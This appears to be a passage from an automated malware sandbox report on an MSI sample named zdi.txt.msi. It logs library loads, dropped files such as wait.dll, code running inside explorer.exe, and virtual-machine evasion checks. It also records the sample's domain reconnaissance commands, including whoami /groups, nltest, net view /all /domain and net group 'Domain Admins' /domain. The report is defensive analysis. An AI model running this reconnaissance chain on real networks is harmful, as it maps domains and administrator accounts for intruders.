Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\Installer\MSI48D4.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Installer\MSI48D4.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Installer\MSI48D4.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Installer\MSI48D4.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Installer\MSI48D4.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: esscli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: netutils.dll

Source: C:\Windows\Installer\MSI48D4.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: zdi.txt.msi

Static file information: File size 2254336 > 1048576

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI48D4.tmp, 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, MSI48D4.tmp, 00000003.00000000.1677749985.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, zdi.txt.msi, MSI48D4.tmp.1.dr, 424593.msi.1.dr, MSI4808.tmp.1.dr
Source:	Binary string: C:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\NvXDCore\x64\ReleaseWin7\bin\NvXDCore.pdb source: rundll32.exe, 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmp, wait.dll.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI48D4.tmp, 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, MSI48D4.tmp, 00000003.00000000.1677749985.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, zdi.txt.msi, MSI48D4.tmp.1.dr, 424593.msi.1.dr, MSI4808.tmp.1.dr

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D89E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

9_2_0B8D89E4

Source: wait.dll.1.dr

Static PE information: real checksum: 0x1d7e57 should be: 0x216e55

Source: wait.dll.1.dr

Static PE information: section name: .didat

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3323C push ecx; ret	3_2_00C3324F
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358C1 push eax; ret	3_2_00C358C2
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358C4 push edx; ret	3_2_00C358C6
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358C8 push ebp; ret	3_2_00C358CA
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358CC push edx; ret	3_2_00C358D6
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358D7 push esp; ret	3_2_00C358DA
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35881 push ecx; ret	3_2_00C35882
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35884 push ecx; ret	3_2_00C35892
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35893 push ebx; ret	3_2_00C35896
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35898 push si; ret	3_2_00C3589A
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358A0 push ebx; ret	3_2_00C358A6
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358A9 push esi; ret	3_2_00C358AA
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35863 push esp; ret	3_2_00C35866
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35860 push edx; ret	3_2_00C35862
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35869 push edi; ret	3_2_00C3586A
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3586F push ecx; ret	3_2_00C35872
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35875 push esp; ret	3_2_00C35876
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35879 push edi; ret	3_2_00C3587A
Source: C:\Windows\System32\rundll32.exe	Code function: 5_3_0000023CDA650105 push ecx; retf	5_3_0000023CDA65010E

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\msiexec.exe

Executable created and started: C:\Windows\Installer\MSI48D4.tmp

Jump to behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /all

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI468D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\wait.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI473C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI46EC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI48D4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI471C.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI468D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI473C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI46EC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI48D4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI471C.tmp	Jump to dropped file

Boot Survival

Uses net.exe to modify the status of services

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\net.exe net config workstation

Uses whoami command line tool to query computer and username

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D76DC rdtsc

9_2_0B8D76DC

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D4948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

9_2_0B8D4948

Source: C:\Windows\System32\rundll32.exe	Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,	5_2_0000023CDA4A4D00
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	9_2_01378424
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	9_2_01377274

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00007FFDFA8ADCBC WTSGetActiveConsoleSessionId,WTSEnumerateSessionsW,WTSFreeMemory,WTSQueryUserToken,GetLastError,SetupDiGetClassDevsW,GetLastError,SetupDiGetDeviceInstanceIdW,GetLastError,StrStrIW,SetupDiGetDeviceRegistryPropertyW,lstrcmpiW,CM_Get_DevNode_Status,SetupDiOpenDevRegKey,RegCloseKey,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,CloseHandle,

5_2_00007FFDFA8ADCBC

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5757	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 484	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3320	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 876	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 877	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI468D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\wait.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI473C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI46EC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI471C.tmp	Jump to dropped file

Source: C:\Windows\Installer\MSI48D4.tmp	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_3-32911
Source: C:\Windows\System32\rundll32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_5-54747

Source: C:\Windows\Installer\MSI48D4.tmp	API coverage: 6.4 %
Source: C:\Windows\System32\rundll32.exe	API coverage: 3.8 %

Source: C:\Windows\explorer.exe TID: 8080	Thread sleep count: 5757 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8080	Thread sleep time: -5757000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8088	Thread sleep count: 484 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8088	Thread sleep time: -48400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8080	Thread sleep count: 3320 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8080	Thread sleep time: -3320000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C4B02D FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00C4B02D
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA922E90 swprintf,swprintf,FindFirstFileW,GetLastError,swprintf,FindNextFileW,CompareFileTime,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,swprintf,swprintf,FindClose,	5_2_00007FFDFA922E90
